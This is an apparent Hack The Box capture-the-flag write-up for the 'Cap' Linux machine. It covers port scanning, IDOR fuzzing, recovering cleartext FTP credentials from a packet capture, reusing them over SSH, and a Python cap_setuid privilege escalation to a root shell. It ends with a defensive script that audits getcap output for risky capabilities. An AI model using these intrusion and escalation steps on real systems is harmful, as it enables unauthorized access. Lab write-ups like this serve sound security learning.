Cap

January 05, 2026

Created by: InfoSecJack
Page: Hack The Box
Difficulty: Easy
OS: Linux

Enumeration

The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.245 -oG scan
    /opt/extractports scan
    nmap -p21,22,80 -Pn -sCV 10.10.10.245 -oN ports

Web enumeration

While browsing the web application, I noticed that accessing the URL http://10.10.10.245/data/3 displayed a page with a download button pointing to http://10.10.10.245/download/3

Suspecting insecure direct object references (IDOR), I performed fuzzing against the /data/ endpoint to identify other accessible resources:

    ffuf -c -t 50 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u "http://10.10.10.245/data/FUZZ" --mc=200

This revealed additional files, including http://10.10.10.245/download/0

I downloaded this file and identified it as a Wireshark capture.

Credential Disclosure via Packet Capture

Upon analyzing the PCAP file, I discovered an FTP session where credentials were transmitted in clear text. The credentials belonged to the user nathan.

Using these credentials, I authenticated to the FTP service and retrieved the user flag:

    ftp 10.10.10.245

Privilege Escalation

Since SSH was also available, I reused the same credentials to obtain a shell on the system:

    ssh nathan@10.10.10.245

After gaining access, I enumerated Linux capabilities assigned to binaries:

    getcap -r / 2>/dev/null

The binary /usr/bin/python3.8 had the following capabilities:

    cap_setuid,cap_net_bind_service+eip

The cap_setuid capability allows changing the effective UID, which can be abused to escalate privileges. I spawned a Python shell and changed the UID to 0 (root):

    /usr/bin/python3.8
    >>> import os
    >>> os.setuid(0)
    >>> os.system("/bin/bash")

This resulted in a root shell, allowing me to retrieve the root flag.
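
The same getcap output read from the defender's side, as an added example that is not part of the original write-up: it parses both getcap output layouts and reports files whose permitted set holds a capability that leads to root, marking interpreters such as the python3.8 binary found here. The RISKY and INTERPRETERS lists and every sample line except the first are assumptions made for the example.

```python
import re

# Capabilities that lead to root or bypass file permissions (this example's
# own selection, not an exhaustive list).
RISKY = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
         "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
         "cap_chown", "cap_fowner", "cap_setfcap"}
# Programs that run caller-supplied code (assumed name list).
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|lua|bash|sh|gdb|vim?)[\d.]*$")
# One cap_to_text clause: optional capability names, then operator/flag groups.
CLAUSE = re.compile(r"^(cap_\w+(?:,cap_\w+)*)?((?:[=+-][eip]*)+)$")

# Constructed sample: line 1 is this page's finding in the older getcap layout
# ("path = caps+flags"); newer libcap prints "path caps=flags".
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl cap_setuid=ep
/usr/bin/tcpdump cap_net_admin,cap_net_raw+eip cap_setuid+i
"""

def permitted_caps(clauses):
    """Apply clauses left to right; return the caps left in the permitted set."""
    permitted = set()
    for clause in clauses:
        names, ops = CLAUSE.match(clause).groups()
        caps = set(names.split(",")) if names else {"ALL"}
        for op, flags in re.findall(r"([=+-])([eip]*)", ops):
            if op == "=" and not names:
                permitted.clear()            # "=" with no names resets every cap
            if op != "-" and "p" in flags:
                permitted |= caps
            elif op == "=" or "p" in flags:  # "=" without p, or "-p", lowers it
                permitted -= caps
    return permitted

def audit(getcap_output):
    """Return (path, risky_caps, is_interpreter) for files granting risky caps."""
    findings = []
    for line in getcap_output.splitlines():
        tokens = line.split()
        i = len(tokens)
        while i > 1 and CLAUSE.match(tokens[i - 1]):  # clauses trail the path
            i -= 1
        caps = permitted_caps(tokens[i:])
        risky = sorted(c for c in caps if c in RISKY or c == "ALL")
        if risky:
            path = " ".join(tokens[:i])
            findings.append((path, risky, bool(INTERPRETERS.match(path.rsplit("/", 1)[-1]))))
    return findings
```

Feed `audit()` the text produced by `getcap -r / 2>/dev/null`; the tcpdump sample line is not reported because its cap_setuid is only in the inheritable set. An unneeded grant is removed with `setcap -r <path>`.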